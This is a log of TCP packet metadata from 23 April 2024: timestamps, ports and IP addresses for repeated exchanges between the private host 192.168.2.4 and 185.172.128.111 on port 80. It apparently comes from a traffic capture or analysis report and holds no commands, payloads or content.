Apr 23, 2024 09:26:59.066442966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066472054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066478968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066497087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066514015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066549063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066561937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066561937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066585064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066601038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066622019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066658974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066659927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066682100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066694021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066710949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066730022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066749096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066766024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066782951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066802979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066818953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066838980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066859961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066874027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066909075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066910982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066931009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066947937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066971064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066983938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067011118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067022085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067040920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067056894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067075968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067094088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067115068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067128897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067153931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067164898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067183971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067202091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067219973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067236900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067259073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067275047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067296028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067310095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067332983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067348957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067368984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067384005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067405939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067420959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067442894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067456007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067481041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067492008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067519903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067528009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067550898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067564011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067579985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067600012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067621946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067636013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067660093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067671061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067697048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067707062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067733049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067743063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067774057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067779064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067794085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067815065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067841053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067851067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067869902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067887068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067902088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067924023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067941904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067960024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.067986012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.067995071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068010092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068032026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068056107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068067074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068085909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068121910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068150043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068157911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068185091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068196058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068228960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068232059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068255901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068269014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068291903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068304062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068332911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068340063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068363905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068375111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068387032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068412066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068434954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068448067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068474054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068484068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068505049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068521023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068542004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068557024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068578959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068593025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068614006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068629026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068650007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068665028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068691969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068701029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068717003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068737030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068758011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068772078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068797112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068809032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068825960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068845034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068866014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068881035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068916082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068928957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068929911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068952084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.068984032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.068988085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069003105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069025040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069041967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069061995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069071054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069097996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069129944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069133997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069154978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069171906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069197893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069207907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069231033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069243908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069269896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069279909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069299936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069314957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069334030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069350958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069371939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069387913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069413900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069423914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069447994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069459915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069483042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069497108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069520950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069531918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069557905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069567919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069587946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069603920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069626093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069639921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069664001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069675922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069699049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069727898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069749117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069767952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069789886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069802999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069823980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069839001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069863081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069875002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069895983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069911957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069931984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069947958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.069967031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.069984913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.070005894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.070020914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.070044041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.070058107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.070092916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.070112944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.275866985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.275932074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.275969028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276005030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276038885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276074886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276072025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276072025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276129961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276166916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276185989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276185989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276206970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276217937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276243925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276252985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276281118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276300907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276318073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276328087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276357889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276376009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276395082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276407957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276431084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276447058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276467085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276488066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276501894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276513100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276537895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276556969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276572943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276587963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276609898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276626110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276645899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276669979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276683092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276705027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276720047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276741982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276765108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276776075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276812077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276828051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276848078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.276868105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.276884079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.277019978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.277192116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.482677937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482711077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482727051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482743979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482758999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482774973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482791901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482808113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482824087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482840061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482855082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482871056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482886076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482903004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482928038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482934952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.482944012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482935905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.482935905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.482960939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482979059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.482995987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.483011961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.483012915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.483014107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.483028889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.483042002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.483046055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.483062983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.483078957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.483088970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.483108044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.483154058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.688854933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.689105034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:00.047056913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:00.047056913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:00.252954960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:00.253021955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:00.253052950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:00.253086090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:00.578917980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:00.579119921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:00.675652027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:00.675652027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:00.881670952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:00.881736040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:01.143585920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:01.143810987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:01.163347960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:01.369074106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:01.562393904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:01.562515020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:01.854197979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.060225964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.187139988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.187278986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.348217964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.553872108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656657934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656713963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656749010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656786919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656822920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656857967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656893969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.656894922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.656896114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.656896114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.656896114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.656896114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.656927109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.657006025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.657006025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.657006025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.657092094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.657128096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.657300949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.657300949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.862740993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.862790108 CEST	80	49730	185.172.128.111	192.168.2.4
